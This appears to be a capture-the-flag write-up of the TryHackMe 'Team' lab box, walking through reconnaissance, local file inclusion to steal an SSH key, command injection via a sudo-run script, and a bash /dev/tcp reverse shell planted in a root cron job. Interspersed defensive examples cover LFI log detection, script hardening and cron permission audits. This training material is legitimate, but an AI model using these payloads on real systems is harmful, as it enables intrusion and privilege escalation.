TryHackMe: Team Boot2Root Write-up

Abdullah Hamza
10 min read · Nov 17, 2023


Team box CTF Write-up

To access the box, click on the following link and join the room.

Check connection

Ping the machine IP to check whether the connection is established. In my case the ping is successful, so the connection is established.

Checking Connection

Scanning

Let’s start with an nmap scan. Use the following command to scan the target IP address.

sudo nmap -A 10.10.30.96

The above command is using Nmap with aggressive scanning options.

  • sudo runs the nmap command with superuser privileges.
  • nmap is the Nmap command-line tool for network exploration and security auditing.
  • -A enables aggressive scanning options, including OS detection, version detection, script scanning, and traceroute.
  • 10.10.30.96 is the IP address of the target we are scanning.
nmap scan results

The Nmap scan results show that ports 21, 22, and 80 are open, meaning that services are running on these ports on the target system.

Scanning for anonymous FTP login

An FTP service is running on port 21. Let’s scan port 21 to check whether anonymous login is allowed. Use the following command to scan port 21.

nmap -p 21 --script ftp-anon 10.10.30.96

The above command is using Nmap with specific options to perform a script scan targeting port 21 (FTP) and using the ftp-anon script.

  • nmap is the command-line tool for network exploration and security auditing.
  • -p 21 specifies the target port as 21.
  • --script ftp-anon specifies the Nmap script to be executed. The ftp-anon script checks whether the FTP server allows anonymous (unauthenticated) login.
  • 10.10.30.96 is the IP address of the target system.
nmap scan results for anonymous FTP login

The Nmap results do not show any sign that anonymous FTP login is allowed.

Visit the target IP

Let’s visit the target IP address in the browser. It shows only the default Apache2 page of an Ubuntu server.

Webpage on port 80 of target IP

Override DNS resolution

We remember that the HTTP title in the nmap results was Team, so let’s add this name to the hosts file. Use the following command to edit the hosts file.

sudo nano /etc/hosts

  • sudo executes the command with superuser (root) privileges, which are needed to modify system files.
  • nano is a command-line text editor.
  • /etc/hosts is the path to the hosts file, the system file that maps IP addresses to hostnames.

Add the target IP and assign it the domain team.thm as shown in the figure below. Press Ctrl + x to save, press y for yes and hit Enter. Cool!! We have a URL now.

updated /etc/hosts file

Let’s check that in the browser. Use the following command in the terminal to open the URL in the browser.

firefox team.thm
team.thm url working in browser

Our URL is working. Congratulations!!🚀

Directory Busting

Let’s start directory busting with gobuster. Use the following command.

gobuster dir -u http://team.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

  • gobuster dir starts Gobuster in directory/file enumeration mode.
  • -u http://team.thm/ specifies the target URL to be scanned.
  • -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt specifies the wordlist (dictionary) file to be used for the brute-force enumeration.
Directory busting results

Directory busting shows a few directories, but most of them are forbidden.

Hunt for Sub-Domains

Let’s try our luck hunting for sub-domains. Use the following command.

sudo gobuster vhost -u http://team.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

  • sudo runs the command with superuser privileges.
  • gobuster is the tool being used.
  • vhost selects virtual host mode, in which Gobuster tries to identify subdomains or hosts associated with the target domain.
  • -u http://team.thm denotes the target URL for the scan.
  • -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt specifies the wordlist (dictionary) to be used during the scan.

Gobuster will attempt to enumerate subdomains by trying each entry in the specified wordlist against the target URL.

Subdomain enumeration results

We found 3 subdomains. Let’s add dev.team.thm to our /etc/hosts file and visit it in the browser.

sudo nano /etc/hosts
subdomain added to /etc/hosts file

Use the following command to open dev.team.thm in the browser.

firefox dev.team.thm
subdomain opened in browser

The page opens in Firefox and contains another link, so let’s click on it.

link from dev.team.thm

As soon as the link opens we notice that the URL has changed, so let’s check whether it is vulnerable to local file inclusion. Let’s change the URL to request the passwd file from the etc directory as shown below.

http://dev.team.thm/script.php?page=../../../../../etc/passwd
/etc/passwd file

We got the passwd file, which shows that the link is vulnerable to local file inclusion. The nmap results showed that the server is Apache running on Ubuntu. On Linux, the ssh_config file contains the configuration settings for the SSH client; it sets the options that govern SSH connections initiated from that machine. Let’s try to get that file. Use the following modified link to get it.

http://dev.team.thm/script.php?page=/etc/ssh/ssh_config
/etc/ssh/ssh_config file in browser

We got the ssh_config file in the browser, but there’s nothing special in it. Let’s hunt for the sshd_config file. On Linux, /etc/ssh/sshd_config is the main configuration file of the SSH server; it contains the settings and directives that govern the behaviour of the SSH daemon (sshd). Use the following modified link to get it.

http://dev.team.thm/script.php?page=/etc/ssh/sshd_config
/etc/ssh/sshd_config file in browser

Congratulations!!! We got the sshd_config file, and it contains dale’s private key (id_rsa). Interesting!! Let’s view the page source in the browser and grab that private key.

source code of particular page

Let’s copy the private key and save it on our machine. Use the following command to open a new file in the nano editor.

nano id_rsa

Press Ctrl + Shift + v to paste the copied key into the nano editor.

private key

Don’t forget to remove the # from the beginning of each line, as # is the comment character (in bash as well as in sshd_config, where the key was stored commented out).

id_rsa after removing hashes

Press Ctrl + x, then press y to save the changes, and hit Enter.

chmod 600 id_rsa

The command chmod 600 id_rsa sets the permissions of the id_rsa file, the SSH private key, to read and write for the owner and no access for any other user or group. This protects the private key material, and SSH refuses to use a private key whose permissions are more permissive than this.

setting permissions for id_rsa file
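The files fetched above were pulled through the `page=` parameter of script.php, and every one of those requests is visible in the web server's access log. The following detection check is an added example, not part of the original write-up: it flags log entries whose `page=` value carries a directory-traversal sequence or an absolute path, and it also covers the URL-encoded form of the traversal, which the room itself did not need. The log lines are constructed for the demo.

```shell
# Constructed Apache access-log sample: one normal include, three suspicious ones.
SAMPLE_LOG='10.10.14.5 - - [17/Nov/2023:10:01:02 +0000] "GET /script.php?page=teamshare.php HTTP/1.1" 200 512
10.10.14.5 - - [17/Nov/2023:10:01:09 +0000] "GET /script.php?page=../../../../../etc/passwd HTTP/1.1" 200 2048
10.10.14.5 - - [17/Nov/2023:10:01:15 +0000] "GET /script.php?page=/etc/ssh/sshd_config HTTP/1.1" 200 4096
10.10.14.5 - - [17/Nov/2023:10:01:21 +0000] "GET /script.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 2048
10.10.14.7 - - [17/Nov/2023:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 10918'

# Print only the suspicious requests: page= followed by "../", by its
# URL-encoded form (%2e%2e%2f or %2e%2e/), or by an absolute path "/...".
lfi_hits() {
    printf '%s\n' "$SAMPLE_LOG" |
        grep -Ei 'page=(\.\./|%2e%2e(%2f|/)|/)'
}

# Number of suspicious requests, usable as a simple alert threshold.
lfi_hit_count() {
    lfi_hits | wc -l | tr -d ' '
}
```

On a live server, replace the embedded sample with `cat /var/log/apache2/access.log` and keep the rest unchanged.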

Get user flag

Now that we have dale’s private key, let’s SSH into the server and hunt for the user flag. Use the following command to do that.

ssh -i id_rsa dale@team.thm
  • ssh initiates the SSH connection.
  • -i id_rsa specifies the private key file "id_rsa" to be used for authentication. The -i flag denotes the identity file.
  • dale@team.thm indicates the username "dale" and the hostname "team.thm" of the remote server.

This command attempts to authenticate the user “dale” on the server “team.thm” using the private key “id_rsa” rather than a password.

SSH into dale’s account

Boom!! We are in as dale.

Let’s verify it with the whoami command.

Linux terminal

Let’s use the ls command to list files and directories.

listing files

We got the user.txt file. Let’s cat it and capture the user flag.

user flag captured

Congratulations!!! 🎉👏🥳

Get root flag

Now that we are logged in as the user dale, we will check our privileges by running the following command:

sudo -l

It lists the commands or scripts the current user is allowed to execute with superuser (root) privileges or as another specified user.

Results of sudo -l command

The results show that we are allowed to run the admin_checks file as gyles. Let’s use the cat command to check what’s inside that file.

cat /home/gyles/admin_checks

The above command will display the contents of the file named “admin_checks” located in the “/home/gyles/” directory.

content of admin_checks file

admin_checks is a bash script. It prompts the user for the name of the person backing up the data and for a date, saves this information to a stats file, and creates a backup of the stats file with a timestamp in its name. The line $error 2>/dev/null seems to be an attempt to suppress error messages, but it expands the user-supplied variable and runs it as a command. That’s something we can abuse. Let’s try it with the following command:

sudo -u gyles /home/gyles/admin_checks

The above command runs the script admin_checks as the user gyles via sudo, so it executes with the permissions and settings of the gyles user.

Enter any name, and when prompted for the timestamp type bash instead to trigger the "error". The script appears to hang; type the command id and hit Enter. The command runs and we get its output. Use the whoami command to verify: the result shows we are now running as gyles.

privilege escalation
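The root cause above is that a string read from the user is expanded unquoted and executed as a command. The function below is an added example, not the script from the box: it is a hardened rewrite of the same prompt-and-backup logic that treats both inputs as data, accepts only the literal word date, and refuses everything else. STATS_DIR is an assumed location so the demo runs in a temporary directory.

```shell
# Assumed stats location; falls back to a temp dir so the example runs anywhere.
STATS_DIR="${STATS_DIR:-$(mktemp -d)}"

# Read the name and the timestamp choice from stdin, as the interactive script
# does, but never execute what the user typed. Prints the timestamp used and
# returns 0 on success, 1 when the input is rejected.
hardened_checks() {
    read -r name || return 1
    read -r choice || return 1

    # Only a conservative character set is allowed in the name; anything else
    # (shell metacharacters, spaces, empty input) is rejected.
    case "$name" in
        ""|*[!A-Za-z0-9._-]*) echo "rejected name" >&2; return 1 ;;
    esac

    # The only accepted "command" is the literal word date. The original
    # script ran $choice itself, so "bash" or "id" got executed as gyles.
    case "$choice" in
        date) stamp=$(date "+%F-%H-%M") ;;
        *)    printf 'unsupported option: %s\n' "$choice" >&2; return 1 ;;
    esac

    printf '%s\n' "$name" >> "$STATS_DIR/stats.txt"
    cp "$STATS_DIR/stats.txt" "$STATS_DIR/stats-$stamp.bak"
    printf '%s\n' "$stamp"
}
```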

Let’s make the shell stable using the following Python command.

python -c "import pty;pty.spawn('/bin/bash')"
stable shell

We have a stable shell now. Let’s verify this with the whoami command.

Verifying shell

Let’s list files and directories with the ls -la command.

listing directories and files

I have checked the .ssh directory but found nothing interesting. Let’s move up to the root of the file system with the cd / command and list the files there with ls.

listing files on the root directory

Let’s enter the opt directory and check what we have got.

listing files in opt directory

We have another directory named admin_stuff. Let’s check that now.

listing files in admin_stuff

We have another bash script. Let’s check what’s inside it. The script shows that two cronjobs are running to maintain backups.

viewing script.sh file

Now let’s check the main_backup script with the cat command.

main_backup.sh script

The main_backup.sh script is run from a cronjob and executes every minute. Sounds interesting!! We can get a reverse shell as the admin with that. Let’s do this by adding the following command to the bash script.

bash -i >& /dev/tcp/[host_machine_ip]/5555 0>&1

The above command is a bash one-liner for creating a reverse shell. It connects to the specified IP address on port 5555 and attaches an interactive shell to that connection. Use the ifconfig command to find the host machine’s IP.

result of ifconfig command

Open the main_backup.sh script in the nano editor and add the one-liner to it. Don’t forget to fill in the IP address and port number.

One liner added to main_backup script

Press Ctrl + x, then press y to save the changes, and hit Enter to exit.

Let’s start a listener on our host machine to catch the shell. Use the following command for that.

nc -lvp 5555
Starting listener on port 5555

The command nc -lvp 5555 sets up netcat to listen (-l) for incoming connections on port 5555 (-p) with verbose output (-v).

Now wait up to a minute: the script is run from the cronjob and executes every minute.

Reverse shell

Boom!! Here we go... we have a reverse shell now 🎉

Let’s use the ls command to list the files; there is a root.txt file.

listing files

We can capture the root flag by using cat command.

Root flag captured
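The misconfiguration behind the root shell is a cron job running as root that executes a script a lower-privileged user can edit. The audit below is an added example, not from the write-up: it walks an /etc/crontab-style listing, resolves the script each entry runs, and reports any script whose group or other write bit is set. The crontab text and the two scripts are constructed in a temporary directory so the check runs anywhere.

```shell
# Constructed demo tree: one world-writable script (the weak setting) and one
# with the correct mode.
DEMO=$(mktemp -d)
mkdir -p "$DEMO/opt/admin_stuff"
printf '#!/bin/bash\necho backup\n' > "$DEMO/opt/admin_stuff/main_backup.sh"
printf '#!/bin/bash\necho ok\n' > "$DEMO/opt/admin_stuff/script.sh"
chmod 777 "$DEMO/opt/admin_stuff/main_backup.sh"   # weak: anyone can edit it
chmod 755 "$DEMO/opt/admin_stuff/script.sh"        # correct: owner-only write

# Constructed /etc/crontab content: five time fields, the user, then the command.
CRONTAB="* * * * * root $DEMO/opt/admin_stuff/main_backup.sh
0 * * * * root $DEMO/opt/admin_stuff/script.sh >/dev/null 2>&1
# comment lines are ignored"

# True when the mode string from ls -l (e.g. -rwxrwxrwx) has the group write
# bit (column 6) or the other write bit (column 9) set.
writable_by_others() {
    case "$(ls -ld "$1" | cut -c1-10)" in
        ?????w*|????????w*) return 0 ;;
        *) return 1 ;;
    esac
}

# Print "WRITABLE BY OTHERS: <user> <script>" for each offending crontab entry.
audit_cron_scripts() {
    printf '%s\n' "$CRONTAB" | grep -v '^[[:space:]]*#' |
    while read -r min hr dom mon dow user cmd; do
        script=${cmd%% *}            # first word of the command field
        [ -f "$script" ] || continue # skip entries whose command is not a file
        if writable_by_others "$script"; then
            printf 'WRITABLE BY OTHERS: %s %s\n' "$user" "$script"
        fi
    done
}
```

On a real host, replace the embedded CRONTAB with `cat /etc/crontab /etc/cron.d/*`; the loop and the permission check stay the same.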

Paste the user and root flags into TryHackMe and submit the answers.

CONGRATULATIONS!!! The room is completed!

This walkthrough finishes here. Stay tuned for the next adventure! 🚀😊


Written by Abdullah Hamza

Developer | CEH | Penetration Tester | Red Team